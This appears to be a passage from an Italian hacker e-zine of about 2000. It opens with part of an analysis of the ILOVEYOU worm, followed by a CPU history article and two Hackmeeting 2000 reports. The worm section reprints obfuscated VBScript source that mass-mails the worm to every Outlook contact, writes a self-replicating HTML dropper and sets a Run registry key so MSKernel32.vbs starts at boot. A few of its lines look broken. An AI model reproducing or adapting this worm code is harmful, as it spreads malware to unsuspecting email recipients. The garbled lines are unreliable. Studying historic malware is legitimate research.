regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-Software%
    -%Microsoft%-%WAB%-%]-]&malead,1,]-]REG_DWORD]-]
end if
x=x+1
next
regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
  -]&a,a.AddressEntries.Count
else
regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
  -]&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

<------- fine codice ------->

*********** DEBUG ***************
per prima cosa il worm si crea un oggetto, poi ne crea un altro correlato ad 
outlook in seguito il bastardo si crea una MApi che va' a leggere l'ultimo dei
destinatari di posta inseriti nella vostra rubrica dopi di ke lo legge dal 
registro se non lo trova li' setta la var regv a 1 se poi il count degli 
indirizzi e' uguale a quelli nel registro allora per ogni indirizzo manda
una mail con subject: i love you nel body
"love letter coming from me" e come attchment il file malefico altrimenti 
aggiunge il count non trovato nel registro e fa' la stessa cosa;)


<------- inizio codice ------->
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=]-]<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE>
  <META NAME=@-@Generator@-@CONTENT=@-@BAROK VBS - LOVELETTER@-@>
]-]&vbcrlf& _]-]
<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? 
  @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>]-]&vbcrlf& _
]-]<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...
 @-@>]-]&vbcrlf& _]-]<?-?HEAD><BODY ONMOUSEOUTD>
<BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open
(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ ]-]&vbcrlf& _]-]ONKEYDOWN=
  @-@window.name=#-#main#-#;window.open
   (#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ 
  BGCOLOR=@-@#FF9933@-@>]-]&vbcrlf& _]-]<CENTER><p>This HTML file need ActiveX
Control<?-?p><p>To Enable to read this HTML file<BR>
  - Please press #-#YES#-# button to Enable ActiveX<?-?p>]-]&vbcrlf& _
]-]<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-
  @>----------z--------------------z----------<?-?MARQUEE> ]-]&vbcrlf& _
]-]<?-?BODY><?-?HTML>]-]&vbcrlf& _
]-]<SCRIPT language=@-@JScript@-@>]-]&vbcrlf& _
]-]<!--?-??-?]-]&vbcrlf& _
]-]if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;
  window.moveTo(0,0);window.resizeTo(wi,hi);}]-]&vbcrlf& _
]-]?-??-?-->]-]&vbcrlf& _
]-]<?-?SCRIPT>]-]&vbcrlf& _
]-]<SCRIPT LANGUAGE=@-@VBScript@-@>]-]&vb@-@>]-]&vbcrlf& _
]-]<!--]-]&vbcrlf& _
]-]on error resume next]-]&vbcrlf& _
]-]dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit]-]&vbcrlf& _
]-]aw=1]-]&vbcrlf& _
]-]code=]-]
dta2=]-]set fso=CreateObject(@-@Scripting.FileSystemObject@-@)]-]&vbcrlf& _
]-]set dirsystem=fso.GetSpecialFolder(1)]-]&vbcrlf& _
]-]code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))]-]&vbcrlf& _
]-]code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))]-]&vbcrlf& _
]-]code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))]-]&vbcrlf& _
]-]set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)]-]&vbcrlf& _
]-]wri.write code4]-]&vbcrlf& _
]-]wri.close]-]
]-]if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then]-]&vbcrlf& _
]-]if (err.number=424) then]-]&vbcrlf& _
]-]aw=0]-]
]-]end if]-]&vbcrlf& _
]-]if (aw=1) then]-]&vbcrlf& _
]-]document.write @-@ERROR: can#-#t initialize ActiveX@-@]-]&vbcrlf& _
]-]window.close]-]&vbcrlf& _
]-]end if]-]&vbcrlf& _
]-]end if]-]&vbcrlf& _
]-]Set regedit = CreateObject(@-@WScript.Shell@-@)]-]&vbcrlf& _
]-]regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-
    ^Windows^-^CurrentVersion^-^
  Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@]-]&vbcrlf& _
]-]?-??-?-->]-]&vbcrlf& _
]-]<?-?SCRIPT>]-]
dt1=replace(dta1,chr(35)&chr(45)&chr(35),]-][-[]-])
dt1=replace(dt1,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])
dt4=replace(dt1,chr(63)&chr(45)&chr(63),]-]/]-])
dt5=replace(dt4,chr(94)&chr(45)&chr(94),]-]%-%]-])
dt2=replace(dta2,chr(35)&chr(45)&chr(35),]-][-[]-])
dt2=replace(dt2,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])
dt3=replace(dt2,chr(63)&chr(45)&chr(63),]-]/]-])
dt6
dt6=replace(dt3,chr(94)&chr(45)&chr(94),]-]%-%]-])
set fso=CreateObject(]-]Scripting.FileSystemObject]-])
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),]-][-[]-],chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),]-]]-]]-]]-],chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),]-]%-%]-],chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&]-]&vbcrlf& _]-]
end if
next
set b=fso.CreateTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-])
b.close
set d=fso.OpenTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-],2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.clo dt6
d.close
end sub
<------- fine codice ------->
************* debug ****************
questa routine ricostruisce semplicemente il codice html originale (quello 
rinvenuto a manila)

---ValK---

---------------------------------------------------------------[ HaRdwArE ]---
===] L'EVOLUZIONE DEI CPU ]===================================================
-----[ H4mBuck3r ]------------------------------------------------------------

"Long Time Reader ....... First Time Writer"

#include <fantasia.h>
#include <stronzate.h>
#include <pazienza.h>

Allora... iniziamo...innanzitutto mi presento:
sono H4mBuck3r (ma va?) come avrete capito (chi conosce l'inglese!!)  la
prima volta che scrivo un articoluzzo x una E-zine e non so come ma mi 
venuta l'idea di scriverlo proprio sui microprocessori ma se proprio non vi
interessa JFC( salta se Fa Cagare !) at the end.

This the end ....my only friend the end...

Ok basta con le stronzate e iniziamo con i ormai consueti greetings e fuck
dell'e-zinista che si rispetti...

Saluti: prima di tutto saluto Old (sia Drake che Iron hihhih :-P ) poi tutti
quelli che, seguono-leggono o collaborano x AiS tutti i memberz  del progetto
DiGiTaL BrAinS e K.A.O.S. poi (rigorosamente in ordine sparso) M4L3F1K0,
InDiAn0 , Lord'Xyz , Cyborg , C{h}E, maiden2, (ciao minchio'),Hermea, MainMan,
Inkazzato, Led, Cr4'Zz,cancerman, Lupa-4,Pep , Stean , e tutti gli altri di
#olbia  #phreak.it e #aisprod e tutti quelli che x un motivo o per l'altro
non ho citato : Scusate!

Fuck--->ahhhhh ora mi divertooo! Prima di tutto un bel Fuck a "Zio Bill" e a
"Mamma" Telecom (ci vuole!), a tutti quelli che usano i "Nukers-Nabbers"
(Master sei un mito!!) , cristian2 (hai rotto il ca**o! , e poi se volete,
aggiungeteli voi io non odio molta gente!! :-PP.

In sottofondo....
-->Pantera: This Love;
-->Black Sabbath: Paranoid,Iron Man;
-->Metalica: Orion,Master Of Puppets 
-->Blind Guardian: Nightfall,Mirror Mirror, Into The Storm

Cibo consumato...un cazzo ho appena finito di pranzare!!(vabbe' una scatola
di togo ci e' passata lo stesso!!)

Ok ora iniziamo davvero per... forse!

Bene bene iniziamo a parlare dei....indovinate un po'? 
Microprocessori!!

Facciamo una panoramica abbastanza superficiale se no vi annoierei troppo!!

==[ L'Intel 8086. ]==

E' un microprocessore a 16 bit con tecnologia HMOS introdotto dalla Intel nel
1978, ha avuto una grande diffusione grazie alla Microsoft che ha sviluppato
x esso l' MS-DOS e alla IBM che lo ha adottato nella sua linea di Personal
Computer  "XT".

Nella versione base l'ibm usava l'8088 che altro non  che la versione a 8
bit dell' 8086.
Pensate che aveva una frequenza di clock di BEN: 5 MHz(Ohhooho!! direte voi!!)
un set di 70 istruzioni di base combinabili fino ad un massimo di 30 tipi di
indirizzamento,compatibilit con l'interfaccia Multibus, address bus a 20 Bit
(1 M),registri operativi a 8 Bit e compatibilit software verso il basso. 

==[ l'80386 ]==

Facciamo un piccolo salto x andare a parlare dell'80386 con il quale l'intel 
entrata nel mercato dei processori a 32 bit con un buon livello di
multitasking,anch'esso  compatibile in software verso il basso, ha il bus
dati e indirizzi separati e a 32 bit cosicch la memoria fisica indirizzabile
arriva a quota 4 GHz ed  pure pipelined cio la prima fase del paralellismo
(chi ne sa +di me mi picchier x questa definizione mah..) ed  quindi in
grado di decodificare le 3 istruzioni successive alla fase di prefetch.

Questo processore puo' lavorare in 3 modalita' diverse:

   MODO REALE--->che coincide con quello dell'8086,con memoria indirizzabile
   limitata ad 1 Mbyte e segmentata in blocchi di 64 KByte indirizzati da
   offset a 16 bit

   MODO PROTETTO--->Nato con l'80286 questo modo permette un efficiente
   funzionamento multitasking gestendo la protezione di memoria fra task
   differenti,impedisce cioe' che un task acceda alla parte di memoria in uso
   da un altro task.
   Il modo protetto adotta una gestione della memoria di tipo virtuale che
   mantiene nella memoria fisica solo le pagine utilizzate mantenendo quelle
   in attesa nella mem di massa.
   I descrittori relativi ai vari task attribuiscono loro uno fra 4 livelli
   di protezione:

livello 0: corrisponde al nucleo del sistema operativo;
livello 1: allo strato esterno sempre del s.o.;
livello 2: alle applicazioni ad alta priorita';
livello 3: alle altre applicazioni.

Le applicazioni posso chiedere i servizi del s.o. solo attraverso opportune
porte di comunicazione (Gate Calls); in nessun altro modo e' possibile
accedere da un livello alle risorse e alla memoria riservate a un livello piu'
interno.

   MODO VIRTUALE 8086---> E' in realta' una variante del modo protetto nel
   quale l'80386 gestisce piu' task concorrenti che lavorano in modo reale in
   pratica un emulazione di piu' 8086,possono comunque coesistere dei task che
   lavorano in modo virtuale 8086 e altri che lavorano in modo protetto vero
   e proprio come ad esempio accade nell' OS/2 della IBM.
   Le istruzioni di questo microprocessore altro non sono che implementazioni
   di quelle gia' esistenti nell'8086 come quelle che gestiscono i dati a 32
   Bit e quelle di controllo dei vari modi di funzionamento.
   Lo spazio di I/O mappato separatamente dalla memoria e sempre di 64 Kbyte
   anche se sono possibili trasferimenti con parallelismo a 32 bit.

==[ l'80486 ]==

Il '486 ha un architettura a 32 bit che implementa tutte le funzioni del
predecessore ma che in piu' incorpora nello stesso chip il coprocessore
matematico per i calcoli in virgola mobile e una memoria cache di 8 Kbyte
interna, al contrario dei sistemi '386 dove la memoria cache era esterna CPU
e necessitava di un apposito cache controller.Viene utilizzata come buffer tra
memoria di sistema e microprocessore,e' una memoria statica (SRAM) veloce che
serve a ridurre i tempi di accesso a istruzioni e dati usati di frequente,
infatti quando la CPU deve leggere dalla ram prima controlla  il contenuto
della memoria cache, se il dato o l'istruzione e' presente lo prende
direttamente da li' con 0 stati di wait altrimenti lo legge dalla RAM di
sistema mettendoci' pero' cosi' dai 2 a 5 stati di wait, viene anche messo
nella cache cosicche' di facilitarne la lettura alla richiesta successiva.

Del '486 subito dopo la sua uscita e' stata introdotta una versione economica:
il '486SX che anche se privo del coprocessore matematico era sostanzialmente
identico, sono poi seguite numerose altre versioni tra le quali ricordiamo
forse il piu' diffuso il '486DX2 a 66 Mhz con clock interno a 66 Mhz e clock
sul bus di 33 Mhz.

==[ Arriva il Pentium.. ]==

Successivamente al '486 e' stato introdotto sul mercato dalla Intel il
Pentium basato su architettura interna a 32 bit ma con bus dati a 64 bit;
incorpora al suo interno un coprocessore matematico e ben 2 memorie cache da
6 Kbyte, una per i dati e una per le istruzioni.

Utilizza inoltre una tecnica di doppio pipelining conosciuta anche con il
termine di "architettura superscalare" la quale permette l'esecuzione di piu'
istruzioni in un singolo ciclo macchina,e' cioe' una CPU almeno parzialmente
parallela,la prima di questo genere utilizzata nell'informatica personale.

==[ Il Pentium MMX ]==

La tecnologia MMX e' un ulteriore innovazione nell'architettura dei processori
Intel che estende le possibilita' multimediali dei PC, si puo' dire che e' il
miglioramento piu' significativo nell'architettura dei processori Intel dopo
l'uscita del '386.

Include, rispetto al Pentium 57 nuove istruzioni orientate ad operazioni di
elevato parallelismo. La tecnologia MMX e' sostanzialmente un architettura
SIMD (Single Istruction,Multiple Data); questa architettura permette ad una
singola istruzione di operare su piu' dati contemporaneamente,ad esempio con
una sola istruzione MMX possono essere sommate 8 coppie di dati di tipo intero
Queste istruzioni parallele utilizzano registri a 64 bit:a seconda 
dell'istruzione, i registri possono essere
visti come contenenti 8byte,4 parole a 16 bit, 1 parole a 32 bit o un dato a
64 bit. Il miglioramento delle prestazioni dovuto ad un alto grado di
parallelismo e' rilevante sopratutto nell'ambito di applicazioni 2D/3D, di
elaborazione immagini e nella compressione dei dati.

==[ Il Pentium Pro ]==

Il Pentium Pro e' anch'esso un evoluzione della famiglia Pentium,sono
disponibili processori a partire da 150 Mhz e possono essere utilizzati fino
a 4 processori insieme in sistemi multiprocessore.

Questo processore permette di ottenere prestazioni superiori ad un Pentium
grazie alla Dynamic Execution (esecuzione dinamica) che altro non e' che una
combinazione delle tecniche qui' sotto:

*******>Multiple Branch prediction:
   il processore praticamente guarda molto piu' avanti dell'istruzione che
   sta eseguendo e predice quelle che molto piu' probabilmente verranno
   eseguite successivamente;

*******>Dataflow Analisys:
   il processore analizza quali istruzioni sono dipendenti dai risultati delle
   istruzioni in esecuzione creando cosi' una lista ottimizzata di istruzioni
   da eseguire;

*******>Speculative Execution:
   la lista di istruzioni ottenuta tramite la Dataflow Analisys viene quindi
   utilizzata in modo da impegnare al massimo le risorse del processore
   ottenendo cosi' un miglioramento complessivo delle prestazioni.

==[ Pentium 2 ]==

Non analizziamo questo processore x motivi di "spazio" [(voglia! ;-P)] vi
basti sapere che altro non e' che un sistema che mette assieme le due
tecnologie sopra descritte cioe' la MMX e Pro.

Saltiamo anche la parte relativa al Pentium 3 e andiamo subito ad analizzare
il nuovo processore della AMD l'Athlon a 1Ghz.

==[ l'Athlon 1 Ghz ]==

A pochi giorni di distanza l'una dall'altra la Intel e l'AMD hanno annunciato
l'uscita dei rispettivi modelli di punta (l'Athlon e il Pentium III) ad 1Ghz;
l'AMD pero' a differenza della Intel lo ha reso subito disponibile sul mercato
mentre l'Intel lo ha solo annunciato.

Vediamo un po' di analizzare questo "sogno" per ognuno di noi che sta leggendo
in questo momento:

L'AMD ha un po' bruciato i tempi,passando dall'Athlon a 850 MHz direttamente
a quello a 1GHz senza passare per quelli intermedi come tutti noi ci
aspettavamo,e cosi' ha fatto l'Intel presentando prima il PentiumIII a 1GHz e
in seguito una specie di versione "economica" a 933 MHz, ma questa uscita
anticipata ha un po' delineato i limiti di questo processore
(parlo dell'Athlon :)) poiche' mentre la famiglia dei PIII integra al suo
interno i due tipi di cache, l'Athlon tiene fuori quella di secondo livello
(L2); spieghiamo meglio questo punto:

il processore per accedere ai dati utilizzati molto frequentemente o
recentemente accinge alla cache;abbiamo due tipi di cache: una di primo 
livello chiamata L1 e una di secondo livello detta appunto L2, il processore 
cerca il dato richiesto nella cache di primo livello, se non lo trova passa a 
quella di secondo livello, se assente pure in questa va a cercarlo nella RAM 
frallentando
cosi' il processo in esecuzione,e' chiaro quindi che la L2 trovandosi
esternamente lavora piu' lentamente del processore stesso costringendolo a
rallentare,e' questo un fatto da non sottovalutare se vogliamo valutare
effettivamente le prestazioni di un processore .

L'AMD ha annunciato di voler spingere in breve tempo gli Athlon fino 1,5GHz
per Poi passare ad una altra famiglia di processori: i "Thunderbird"  che
avranno A detta della casa americana una tecnologia innovativa per superare
questi inconvenienti tecnici.Per ora il prezzo di questo processore si aggira
sui due milioni e mezzo, prezzo abbastanza proibitivo x un utente medio, anche
perche' non si e' rivelato questo "mostro" che ci possiamo aspettare.

Infatti in applicazioni d'ufficio, grafica e giochi otterremo piu' o meno
lo stesso risultato con uno a 700 MHz, anche xche' in grafica e nei giochi
il fattore predominante nella visualizzazione e' la potenza della scheda video
mentre risulta molto buono nella gestione di grandi archivi o dove si
necessiti di una grande potenza di calcolo e il bisogno di un gran numero di
operazioni matematiche.

EEHHHHHHHHHH abbiamo finito!!!! Un graziiieeeeee a tutti quelli che sono
arrivati qua in fondo...(non so come avete fatto mah..).
Non posso lasciarvi senza aver detto la frase (o stronzata fate voi) del
giorno:

"If one man asks another what a Hacker is 
And the other man answers him,
Neither of them knows it."
- Borrowed Zen Proverb

ciao e alla prossima ... 

P.S. x commenti insulti e tutto quello che volete la mia e-mail e'
Hambucker@myself.com

---H4mBuck3r--- 


--------------------------------------------------------------[ HacK-it00 ]---
===] SPECIAL HACK-IT 00 [=====================================================
-----[ OldirOn61 ]------------------------------------------------------------


Anche quest'anno si e' conclusa la kermesse di smanettoni/scoppiati (io mi
trovo nel secondo gruppo! :P) altresi' chiamata "Hackmeeting 00".

Per me e' stata la prima volta (Ebbene si, ero un verginello!), e devo dire
che, esclusa una "fantomatica" rete a 100Mbit che per il 50% era down, e per
il restante si viaggiava ad un max di 3.5K al sec., non e' stato affatto male.
Stupenda l'ambientazione (Nelle cento-celle del CSOA forte prenestino), da
qualche giornale (mi pare la Repubblica) disegnato come uno
"scenario postatomico etc." A dir la verita' l'ambientazione era + medioevale
che postatomica: Celle grezze, a mattoni, zanzare grosse come Apache degne di
US Army, non c'erano finestre, ma feritoie... e per concludere un umidita' che
raggiungeva livelli preoccupanti per le schiene dei poveri hackari, costretti
dalla loro passione a passare 3 giorni li' dentro.....

Per 3 giorni non si e' dormito...anche se arrivati ad una certa ora (5/6 am)
si eseguiva il ben noto comando "halt" e si cercava di pisolare li', nello
stesso posto in cui c'era il PC....

A dir la verita' si era organizzato un Dormitorio... Ma la maggiorparte ha
preferito non mollare mai la propria macchina.

Fondamentalmente, almeno per quanto mi riguarda, e' stata un'esperienza + che
positiva, anche se ci sono state certe cose che non ho gradito molto....

-La rete andava e non andava... lo sport nazionale era quello di girare per le
 altre postazioni a chiedere: "Voi uscite?"....
 Risposta: -No No, noi restiamo qua!- (vero mEtBoyZ ? ;-))

-Sniffer piantati ovunque... si dice addirittura impiantati nel gateway, altro
 elemento sempre presente negli hack-it....

-Per quanto riguarda i corsi... ho gradito molto quelli sul Packet Radio, e
 quello trasmesso via ip-radio su come mettere su un hacklab... bello il
 seminario sul reversing, quello sul Social Engineering, e quello sul Flash,
 che nonostante non abbia molto a che fare con l'hacking vero e proprio, ha
 riscosso molto, anzi moltissimo successo.
 I corsi sul TCP/IP e quello sulla crittografia sono stati invece i meno
 gettonati (capiamoci, non erano orrendi, ma forse erano troppo generali e
 semplici, non destinati ad un pubblico di un hack-it) anche se hanno
 sicuramente contribuito a dare delle forti basi a chi di TCP/IP e
 crittografia sapevano poco e niente....
 Purtroppo, non sono riuscito a seguire il seminario notturno sull'hacking
 delle reti x.25, visto e considerato che gia' 5 minuti prima del corso, la
 cattredale era piena zeppa, ed era quindi impossibile sia guardare, che
 ascoltare il "docente" di turno....
 Non in programma, ma cmq molto interessante, e' stata la lezione "dal vivo"
 della UIC, condotta dal caro amico Quequero, con tutta (o quasi) la UIC al
 seguito, dall'alto della postazione No.7....

-Sono entrate le telecamere del Tg1....e sinceramente questa mossa non e' 
 stata molto gradita....la gente che girava per le postazioni con una 
 telecamera spenta appesa sul petto, ma in realta' ne aveva un altra accessa 
 nascosta dalla mano, che riprendeva praticamente tutto! VERGOGNA!!!!!! 
 Nemmeno il coraggio delle proprie azioni.... girano voci che addirittura 
 siano entrati degli sbirri....ma questo e' un altro discorso.

Purtroppo l'hack-it e' stato segnato in negativo da alcuni furtarelli.... si
dice che siano spariti un banco di ram, un cellulare, e non meno importante
il MIO Cyloom...Approfitto di questo spazio per lanciare l'ultimo, disperato
appello:

CHIUNQUE ABBIA PRESO IL MIO CARO CILOTTO ME LO FACCIA SAPERE, ANCHE IN FORMA
ANONIMA, A OLDIRON61@INAME.COM NON LO RIVOGLIO INDIETRO, VOGLIO SOLO SAPERE
CHE E' VIVO E FUNZIONANTE! ;-) ...E SOPRATTUTTO, CHI LO HA PRESO, RENDA ONORE
AL PADRONE ORIGINARIO, CHE HA PASSATTO DEGLI OTTIMI MOMENTI CON QUEL CILOTTO!!

C'e' altro da dire? Beh si, oltre al lato puramente "tecnico" c'e' quello
umano...ho conosciuto tanti amici, si sono consolidate vecchie amicizie, c'e'
stato un giro di canne al di fuori della norma (vero Gufo?) insomma, la mia
"esperienza" dell'hack-it, oltre ai corsi ed ai vari cazzeggi sul PC e' stata
segnata dall'aver conosciuto gente, che fino a quel momento era solo un "nick"
Ora, sicuramente, questa "gente" e' diventata un bel ricordo nella mia malsana
e scoppiata mente....

Prima di concludere un po' di saluti e ringraziamenti....

Il primo saluto va a Lord Guf... un grazie per tutte le bombe che mi hai
offerto....prometto che l'anno prossimo verro' piu' fornito! ;-)

Il secondo va a tutti quelli che hanno deliziosamente riempito il mio cilotto
(fino a quando ce l'avevo io...), piazzato sopra la mia(?) tower vicino ad un
cartello: "Aiutateci a Riempirlo!" Grazie per aver dilettato dei poveri 
ragazzi "bisognosi"!!!!! ;-)

E poi, in ordine rigorosamente sparso:

Nobody88, Poplix, Rubik, The Duke, Mayhem (che ha descritto la parte sconvolta
di Oldiron61 in diretta a Radio Jodler...), Michell9, QueQuero, TinMan, sP3nky
SpinONE, KriosMan, Baron Sam, Vecna, Smilzo, Dante Alighieri, ]Alt 255[, Smav,
Maniac666, Graffio, Prodigy, Dibellas, Pinna, Dark0, /sPIRIT/, TheSaint, i
Romani del loculo n6, il CSOA Forte Prenestino, tutti quelli che mandano
avanti la baracca, e tutti quelli che sicuramente ho dimenticato!!!

E l'anno prossimo???
A Catania belli miei!!! Per la felicita' di ]CyBOrG[ e di tutti i siculi...
e per la tristezza di tutti i "Nordici" che gia' per venire a Roma hanno
storto un pochino il muso....

Byeeeeeeeeeeeeeeeeee!

---OldirOn61---

--------------------------------------------------------------[ HacK-it00 ]---
===] HACK-IT 00 RESUME [======================================================
-----[ Quequero ]-------------------------------------------------------------


[NOTA DI OLDIRON61: Non fidatevi molto quello che dice il Que, io stavo
 assieme a lui, e vi ASSICURO che non tutto quello che leggerete e'
 attendibile al 100%, e sopratutto la cronologia ed il tempo del racconto e'
 LEGGERISSIMAMENTE sfalsato! ;-))... e poi sono io che perdo i colpi!]



Salve a tutti, belli e brutti :),
finalmente ho a disposizione un po' di tempo per stilare quello che sar il
riassunto dell'HackMeeting 2000 sotto il mio punto di vista :).

[Gioved 15 Giugno 2000]

Io (Quequero), Oldiron61, Kalkutta ed Eugenio ci carichiamo come muli di
componenti informatici e prendiamo il bus dell 19:00 L'Aquila-Roma, dopo poco
meno di due ore arriviamo a Tiburtina, ci infiliamo in una pizzeria ed il
buon Que mangia qualcosa come 6 pizze di seguito....

Usciti da l prendiamo la metro, il tram e dopo 2 ore (erano circa le 22:40)
il tramviere ci dice di scendere che siamo arrivati....Il buio  totale, il
silenzio pure, ma la felicit  tanta....Imbraccio il mio monitor e salgo
delle scalette....Poche centinaia di metri dopo :P arriviamo all'entrata del
forte, la prima scena che ci si presenta davanti erano due uomini che erano
indecisi se rubare un SR50 oppure prendere l'NRG...
Vabb, la seconda scena  stata il buoio, la terza  stata l'entrata al forte.

Varcato il portale dimensionale.....Ermmmm, il portale di ingresso....Un tizio
molto rasta (figoooooooo :) con strani eufemismi ci indica il posto dove
saranno messi i pc...Bene, entriamo a soltanto i primi due loculi erano pieni,
nel secondo c'erano una quantit industriale di computer utilizzati da due
sole persone con tanto di striscia luminosa, lucine rosse e sintetizzatore....

Maledetto sintetizzatore. Ci allochiamo al terzo loculo....
Vediamo per che non c'era il cavo telefonico sicch passiamo al quarto :)...

Bien, montiamo tutto e felici come dei martinetti idraulici dopo le 23
accendiamo il computer....Sorpresa...Il Linux non parte, ma porkkkkkkkk,
decidiamo di farci prestare una distribuzione da quei tipi con le lucine rosse
(che saranno poi soprannominati da me: i Robot, visto il quantitativo di ore
che erano riusciti a rimanere senza dormire...ovvero tutti e 4 i giorni) che
ci danno una Mandrake 7.1 :((..

Vabbu, parte la prima installazione, aspettiamo 51 minuti e poi si blocca,
bene, parte la seconda, aspettiamo (e non scherzo) 2 ore e 51 minuti e tutto
va a buon fine, unico problema era la lentezza esasperante del sistema con
una overbloated distribution :( vabbu, un tizio ci installa la scheda di
rete, dopo ci viene assegnato un ip (192.168.100.122), un DNS (192.168.100.2)
ed un GateWay (192.168.100.1), due ore dopo il nostro ip diventa
192.168.101.122, felici come le pasque di una linea satellitare iniziamo a
scaricare.....

Ottimo, si viaggiava a 20kb/sec miiiii che bello...Tre minuti dopo per la
velocit si era stabilizzata a 2kb/sec con picchi di 0.6kb/sec, vabbu, la
rete ci aveva deluso, ma almeno avevamo da dove nagiare, o meglio, pensavamo
che fosse cos...Beh, non esattamente visto che la rete collassava massimo
ogni 12minuti. Perfect, cazzeggiamo un po', io vado a fare un giro ed un
tizio mi offre una canna (Grazie) poi usciamo, andiamo i bagno, ci andiamo a
comperare ben 6litri d'acqua (1.5 a testa) e torniamo alla postazione.....

Navigando navigando il tempo va, passano le ore e si fanno le 4:20 del mattino
decidiamo di andare a dormire, cerchiamo il dormitorio (che nel frattempo NON
era stato neanche aperto) e ci indicano un luogo pieno di tunisini e
marocchini....Non che sia razzista per carit, per la paura di rialzarci
senza neanche le mutande ci aveva spinti a dormire nel loculo....In fondo non
sarebbe stato tanto male se non ci fossero state zanzare grosse come muli
delle ande, ed i robot che sparavano 24 ore su 24 musica techno, ma ci siamo
abituati, la prima notte avr dormito meno di 30 minuti su quelle maledette
sedie, sicch nel frattempo avevamo deciso di scaricarci due pornazzi da
qualche sito...

Noi che abbiamo il palato raffinato abbiamo propeso per i manga giapponesi....
Neanche ce li siamo scaricati, ma almeno li abbiamo visti :). Arriva 
finalmente la tanto agognata alba, cerco qualcosa per lavarmi che NON trovo...

Alch mi butto in una fontanella cercando di recuperare almeno parte del mio
igiene :)...Vagando vagando vedo davanti ai tunisini delle allegre piantine...
Hehehehehehehehe, ne prendo un paio di foglie da una che reputavo fosse
femmina e le porto dentro, le essicchiamo e le fumiamo...Vabbu, meglio di
niente :),

piccola digressione: il pi (aka oldiron61) aveva detto che quelle
piante erano tutte maschio e pure la mia era maschio.....Ts, non si fosse
mai permesso, sono andato dal tunisino e gli ho chiesto quali fossero femmine,
lui mi ha detto: "tutti maschi tranne quella che sicuramente femmina al 100%",
ovviamente io avevo preso la pianta giusta (oh povero pi che perde i colpi :)
fine digressione.

Siamo faticosamente arrivati al 16/06/2000 ovvero l'inizio ufficiale
dell'hackmeeting 2000, ed infatti la gente arrivava e le belle pulzelle pure
:), intato arriva vecna e degli altri tizi di fianco a noi con la solita
musica techno, quindi conosciamo un certo Pinna, un tanto strano quanto
simpatico, inutile descriverlo perch NON ce la farei MAI! Cotal tipo regala
al pi un cidd di musica techno (e kazz basta con la techno) okkei, tra una
navigata e l'altra arriva un tizio, aveva una faccia davvero troppo simpatica
ed ogni volta che passava ci salutava...Ed io dicevo al pi: "ma questo ki 
e che cavolo vuole che saluta?"...Vabbu, passa una, due, tre, quattro volte
fino a che il pi lo ferma e gli dice ma tu chi sei? E lui:"io sono N0body88!"
...Il pi mi chiama e mi fa: "ti presento sto tipo...Nobody".....Oll il
nostro saluta sfocia in un abbraccio che durer parecchi minuti, la mia 
felicit
era altissima, nobody  stato (ed  ancora) uno dei miei amici di rete pi
cari.....Se vi interessa, lui ci salutava perch in un certo modo si sentiva
dentro di conoscerci, ma era cos buffo che ci aveva fatto ridere tantissimo
:))). Bene, decidiamo di indossare le magliette da battaglia, esco per andare
alle piantine a prendere altre foglie e sento: "C' UN Quequero da queste
parti?"...

Io mi giro e dico: "Potrebbe, ma tu chi sei?"..."Letale Malattia" heheheheheh,
siiiiii io ed il malatuzzo ci presentiamo ed ancora la mia felicit  al
culmine, il malatuzzo che mi aveva aiutato tante e tante volte (anche se un
po' leim :) bene chiacchiero con lui e poi vado al bagno ed alle piantine.....

Successivamente passo all'altra ala del forte dove un tizio mi ferma dicendomi
di essere iscritto alla mia ML (perdonami ma non ricordo il tuo nick :(( ) lo
saluto e conosco anche LordGufo (che ci offre un po' di fumo :) e tanti altri
tizi.....Hihih, poi arriva la UIC, eggi, met UIC stava la, e finalmente
riesco a conoscere il maledetto Baron-Sam :), la sua moglie: Signora Iena,
Spin0ne (che tizio :))) Kriosman, Dibbellas, Pispola, ol dopo lunghe
peripezie qualcuno mi avverte: "Tra poco arriva Xoa e ti vuole vedere nudo
legato al suo cospetto"...

Ahhh iniziamo bene....Poco dopo infatti davanti alla mia postazione passa Xoa
con Spezio, li fermo e mi sbacucchio un po' Xoa che si dimenava per fuggire :)
...Scopro poi che Spezio aveva una concezione della bellezza femminile pari
alla mia...Un motivo in pi per andare d'accordo :)....Bene, chiacchieramo
con Xoa, la UIC, Spezio, LittleJo, Malattia ecc.....

